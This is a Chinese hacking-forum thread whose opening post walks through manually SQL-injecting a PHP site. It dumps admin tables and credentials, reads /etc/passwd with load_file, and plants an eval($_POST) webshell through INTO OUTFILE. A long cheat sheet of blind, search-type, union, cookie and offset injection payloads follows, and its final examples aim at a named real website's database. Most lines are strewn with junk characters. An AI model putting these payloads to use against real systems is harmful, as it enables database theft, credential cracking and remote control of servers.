找回密码
 立即注册
查看: 3750|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~* u2 ~, _: O3 _# @& y
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?( U2 K. m& x0 s) g2 {; }, ]
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。: t+ @  ]/ c- Q8 t
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
5 }0 W+ c& Z, C3 N+ ^1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)# z0 F, |  X5 r' H; L8 C
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
% B+ ]! J2 q2 g) ]1 X7 ^4 B& qWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in2 k! J. W& A1 F! x" {5 S5 ^4 w
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入: [# G, b% R7 R  A; q
                         ' ?; s' X. J& r2 B& j
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
; l5 p1 w1 @- T4 {5 [/ p3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意0 t4 @3 C( C8 ^6 U  X) b
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
# Z6 w1 Z# q9 E; k* g+ J5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
$ }8 o( p8 O2 h/ q2 T6 Y+ \/ S' V4 f/ y有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,/ \# `7 j# b4 M1 D8 H
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。1 c+ y4 F" B4 J% b3 n* @( ^" a
我就用的是第二个思路,
) h3 b5 r5 l) E. v/ p5 G/ Z" [提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  ! L3 o5 v8 s9 V
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,) n: C! C) d  \4 X' K
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--1 D+ c7 l# E- a2 ~: c
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
2 v: @3 ^% b. k! }0 [0 b7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????+ G' V$ _. u# L" q; J3 @
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
5 O; q$ V  S+ t提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
% y& H9 ]) N" j然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,6 J2 T, h: M/ s+ M! \
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
% x4 T  ~* t% u8 e6 S下面是一些很普遍注入方式资料:
" T0 ^% `+ a4 o/ W% Y/ M+ ^5 y注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='0 P1 p% ~1 ^  ]
拆半法
" M" |  R6 Z4 y' R% A######################################) H, |+ C" o- x+ t. ?
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
- u5 l0 _3 O1 J0 ?and exists (select * from admin)- ]0 G+ E" j' s6 w) U9 J8 D
and exists(select id from admin)
3 p  H; d: M8 `and exists(select id from admin where id=1)
3 ?: f# o3 x: s' F2 pand exists(select id from admin where id>1) ; i# V% W# S, w) m+ K8 i
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
% m6 ]% R- Z& @$ E/ _; [and exists (select username from admin)5 x% q! H" J2 r) ^% S
and exists (select password from admin)
" C% _& e/ b  V6 A' N. X. Xand exists (select id from admin where len(username)<10 and id=1)' H1 e' i  |: e1 p5 q- L% @
and exists (select id from admin where len(username)>5 and id=1)
0 C0 i: s, C4 Z0 iand exists (select id from admin where len(username)=6 and id=1)/ r! y) V' W$ {# V& h
and exists (select id from admin where len(password)<10 and id=1)& [! p# T' E+ E1 I/ `0 e
and exists (select id from admin where len(password)>5 and id=1)
1 i' Z4 e0 r8 F1 T3 R0 V* C9 Wand exists (select id from admin where len(password)=7 and id=1)  m2 P& N: u/ M2 ^% b' ?! \
and (select top 1 asc(mid(username,1,1)) from admin)=97
% L0 N0 o) T6 i, m  Y3 U: Y返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
4 Z. D# Z3 J+ n9 |猜第二位把username,1,1改成username,2,1就可以了。
  e8 Q8 R+ F5 f$ B, _; ]猜密码把username改成password就OK了
3 \5 ?8 |' i% r( B  C' }##################################################% ?: N$ q" H0 @0 h; {6 d
搜索型注入+ `  _7 P  R: ?+ P' f. ^
##################################" z( B4 B+ W/ l& ]8 S* I, m
%' and 1=1 and '%'='
- m  C4 C0 M% T0 E%' and exists (select * from admin) and '%'='
& A! ?# w  F- S9 O' l" g$ Q( c3 j%' and exists(select id from admin where id=1) and '%'='
0 p5 q9 B  Q8 z& f! [3 \  H%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
1 ~; B( o2 E& V7 r%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
0 O! q2 y+ E( N%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='7 v) a0 s& J1 \  U: i
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='8 M7 M- |: l" K1 o" C# g
对于MSSQL数据库,后面可以吧 and '%'='换成--
& G+ b7 P1 w# Z$ \- J还有一点搜索型注入也可以使用union语句。
* w3 A  p. t! G0 V" O########################################################* V" h6 E+ p0 n! M
联合查询。
$ g) v% [7 r7 k+ K#####################################
% p( O$ @( R) U8 U3 r7 o6 Porder by 106 x  H" F9 d# p
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
2 O  L6 x! U. z7 j7 Fand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
& C  S0 `% C- T; }" q- y" eand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
. ^/ n  H# M- J& J, m: m很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)4 C9 c. E! Z3 q$ R8 Z
###################################! F( L; w2 Z8 `; N4 X& H. x# K* \
cookie注入
$ E8 u# f) T2 f) b% g9 K( E* `2 O& E################################ ~& c8 W3 J. k6 Z8 t* x+ ]! q" v
http://www.******.com/shownews.asp?id=127% V& Q9 b5 \# x
http://www.******.com/shownews.asp. Z8 @2 }. z0 x9 p1 c; h7 T
alert(="id="+escape("127"));
" y7 G, H% V. `2 h( G" Z' ~alert(="id="+escape("127 and 1=1"));
$ I3 d$ h/ ?. @' |9 y* |alert(="id="+escape("127 order by 10"));) L0 Q- A% K% Q2 g8 q3 @
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));1 ~$ `% G( t$ b1 ~) S
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
+ d$ F; A( ^5 \" M4 f这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
, J0 Z6 P1 B: m" ^0 k' Z; I2 |###################################! b5 ^! I8 Y/ {* s
偏移注入- B' Y" d& N4 I% f5 S" E% l
###########################################################% \$ n4 c9 u( T# R8 V, R5 k
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
+ c( u  Q& C5 t( Cunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
6 s# E* l" ?' y7 T) A: X* i9 sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
; t" T; |7 Y5 P% s2 x7 a5 Eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
9 H) {: E1 x7 H( B$ a& Zunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)& t% y! X2 _; \2 L. y: a0 c% Z
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
5 m8 b) W  G9 z2 |* e3 nunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
. ]' L1 ^3 s0 ]- ^" y, ta.id=d.id)
8 q( F, O3 D7 D) e$ j- j3 J( S. U' Xand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)2 B' A0 g2 {$ l3 M! L, H
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 2 a& P  N) e* h* Q  j) t- u$ j$ _& M
  * {/ F6 @- V) }: h& q0 G* R; t: d
============================================================================================================
& x) }1 c7 S1 \. q; u4 Y. W1.判断版本/ y: ]) l7 o- H* Q; ?) Y
and ord(mid(version(),1,1))>51
0 ]' B5 q: k. l+ V6 B返回正常,说明大于4.0版本,支持ounion查询/ M/ f& V) I$ x5 K7 [
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
( N/ u8 F( N' h9 _$ Iand 2=4 union select 1,2,3,4,5,6,7,8,9--
8 D+ c& w) L" I" t. I+ w1 t: O3.查看数据库版本及当前用户,
8 V! E/ w  {4 @0 f2 q+ ~% {  D! A0 p% h9 dand 2=4 union select 1,user(),version(),4,5,6,7,8,9--6 R- w6 w% H4 o! Y4 }
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,) b1 @5 A( y7 ^7 ~" I
4.判断有没有写权限
& y( [: N6 k* {8 Z7 ?; t. sand (select count(*) from MySQL.user)>0--
! W; \! _0 n- a0 m- n9 `6 Y* k5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. U& C: o+ o& ?, s' }: X用不了这个命令,就学习土耳其黑客手法,如下
" Y! {! F/ L# K2 oand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
6 z8 }; B: F( a: D( J& m8 f% b6.爆表,爆库
$ A" z% o9 l0 ~) D7 Q, z: Eand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--# X, ~7 T. U) P# X& _, }0 D
7.爆列名,爆表
" P, k- O; u2 vand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
* ]2 E1 I# K; A. p0 N4 T8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
3 h6 b* K5 P4 C3 eand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
+ M2 v8 U& ~8 |/ ?. l9.爆字段内容
1 W' q6 e# V& p/ x+ R3 Jand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--! a. [: R1 D- v2 f
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表